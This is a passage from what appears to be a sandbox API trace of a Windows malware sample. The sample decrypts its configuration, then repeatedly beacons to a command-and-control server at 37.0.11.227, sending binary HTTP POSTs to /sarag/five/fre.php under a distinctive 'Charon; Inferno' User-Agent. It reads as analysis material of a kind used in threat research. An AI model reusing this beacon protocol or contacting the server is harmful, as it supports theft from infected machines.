37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0263.522] GetProcessHeap () returned 0x690000 [0263.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0263.522] GetProcessHeap () returned 0x690000 [0263.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0263.523] GetProcessHeap () returned 0x690000 [0263.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0263.523] GetProcessHeap () returned 0x690000 [0263.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0263.525] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0263.526] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0263.526] GetProcessHeap () returned 0x690000 [0263.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0263.526] GetProcessHeap () returned 0x690000 [0263.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0263.531] send (s=0x7a4, buf=0x6ad508*, len=242, flags=0) returned 242 [0263.531] send (s=0x7a4, buf=0x6aba40*, len=159, flags=0) returned 159 [0263.531] GetProcessHeap () returned 0x690000 [0263.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0263.532] recv (in: s=0x7a4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0263.620] GetProcessHeap () returned 0x690000 [0263.621] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0263.622] GetProcessHeap () returned 0x690000 [0263.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0263.626] GetProcessHeap () returned 0x690000 [0263.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0263.642] GetProcessHeap () returned 0x690000 [0263.643] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0263.643] closesocket (s=0x7a4) returned 0 [0263.648] GetProcessHeap () returned 0x690000 [0263.648] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0263.648] GetProcessHeap () returned 0x690000 [0263.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0263.654] GetProcessHeap () returned 0x690000 [0263.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0263.655] GetProcessHeap () returned 0x690000 [0263.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0263.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1554) returned 0x7a4 [0263.657] Sleep (dwMilliseconds=0xea60) [0263.659] GetProcessHeap () returned 0x690000 [0263.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0263.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.665] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0263.742] GetProcessHeap () returned 0x690000 [0263.742] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0263.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.743] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0263.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.744] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.745] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.745] GetProcessHeap () returned 0x690000 [0263.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0263.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.747] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0263.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.756] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0263.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.767] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0263.767] GetProcessHeap () returned 0x690000 [0263.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0263.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.780] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.781] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.845] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.850] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.850] GetProcessHeap () returned 0x690000 [0263.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0263.850] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0263.851] GetProcessHeap () returned 0x690000 [0263.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0263.852] GetProcessHeap () returned 0x690000 [0263.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0263.852] GetProcessHeap () returned 0x690000 [0263.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0263.853] GetProcessHeap () returned 0x690000 [0263.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0263.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.854] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.866] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0263.877] GetProcessHeap () returned 0x690000 [0263.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0263.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.879] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0263.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.880] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.881] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.881] GetProcessHeap () returned 0x690000 [0263.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0263.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.902] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0263.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.903] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0263.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.904] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0263.904] GetProcessHeap () returned 0x690000 [0263.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0263.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.917] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0263.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.918] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0263.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.919] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0263.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.920] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0263.920] GetProcessHeap () returned 0x690000 [0263.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0263.920] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0263.920] GetProcessHeap () returned 0x690000 [0263.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0263.920] socket (af=2, type=1, protocol=6) returned 0x7a8 [0263.921] connect (s=0x7a8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0263.957] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0263.957] GetProcessHeap () returned 0x690000 [0263.957] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0263.957] GetProcessHeap () returned 0x690000 [0263.957] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0263.958] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0263.959] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0263.959] GetProcessHeap () returned 0x690000 [0263.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0263.959] GetProcessHeap () returned 0x690000 [0263.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0263.960] GetProcessHeap () returned 0x690000 [0263.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0263.960] GetProcessHeap () returned 0x690000 [0263.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0263.961] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0263.962] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0263.962] GetProcessHeap () returned 0x690000 [0263.962] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0263.962] GetProcessHeap () returned 0x690000 [0263.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0263.963] send (s=0x7a8, buf=0x6ad508*, len=242, flags=0) returned 242 [0263.964] send (s=0x7a8, buf=0x6aba40*, len=159, flags=0) returned 159 [0263.964] GetProcessHeap () returned 0x690000 [0263.964] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0263.964] recv (in: s=0x7a8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0264.048] GetProcessHeap () returned 0x690000 [0264.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0264.050] GetProcessHeap () returned 0x690000 [0264.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0264.051] GetProcessHeap () returned 0x690000 [0264.053] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0264.053] GetProcessHeap () returned 0x690000 [0264.055] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0264.056] closesocket (s=0x7a8) returned 0 [0264.057] GetProcessHeap () returned 0x690000 [0264.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0264.057] GetProcessHeap () returned 0x690000 [0264.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.058] GetProcessHeap () returned 0x690000 [0264.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0264.060] GetProcessHeap () returned 0x690000 [0264.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0264.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1558) returned 0x7a8 [0264.075] Sleep (dwMilliseconds=0xea60) [0264.077] GetProcessHeap () returned 0x690000 [0264.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0264.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.078] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.085] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0264.093] GetProcessHeap () returned 0x690000 [0264.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0264.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.094] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0264.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.100] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.102] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.102] GetProcessHeap () returned 0x690000 [0264.103] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0264.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.109] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0264.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.110] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0264.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.112] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0264.112] GetProcessHeap () returned 0x690000 [0264.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0264.126] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.126] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.128] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.129] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.130] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.130] GetProcessHeap () returned 0x690000 [0264.130] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0264.130] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0264.130] GetProcessHeap () returned 0x690000 [0264.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0264.131] GetProcessHeap () returned 0x690000 [0264.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.131] GetProcessHeap () returned 0x690000 [0264.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0264.131] GetProcessHeap () returned 0x690000 [0264.131] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0264.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.132] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.143] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0264.153] GetProcessHeap () returned 0x690000 [0264.153] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0264.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.154] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0264.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.156] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.157] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.157] GetProcessHeap () returned 0x690000 [0264.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0264.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.159] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0264.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.163] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0264.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.164] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0264.164] GetProcessHeap () returned 0x690000 [0264.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0264.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.165] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0264.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.166] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0264.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.167] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0264.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.170] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0264.170] GetProcessHeap () returned 0x690000 [0264.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0264.171] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0264.171] GetProcessHeap () returned 0x690000 [0264.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0264.171] socket (af=2, type=1, protocol=6) returned 0x7ac [0264.171] connect (s=0x7ac, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0264.194] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0264.194] GetProcessHeap () returned 0x690000 [0264.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0264.195] GetProcessHeap () returned 0x690000 [0264.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0264.196] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0264.197] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0264.197] GetProcessHeap () returned 0x690000 [0264.197] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0264.197] GetProcessHeap () returned 0x690000 [0264.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0264.198] GetProcessHeap () returned 0x690000 [0264.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0264.198] GetProcessHeap () returned 0x690000 [0264.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0264.199] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0264.200] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0264.200] GetProcessHeap () returned 0x690000 [0264.201] RtlAllocateHeap (HeapHandle=0x690000, 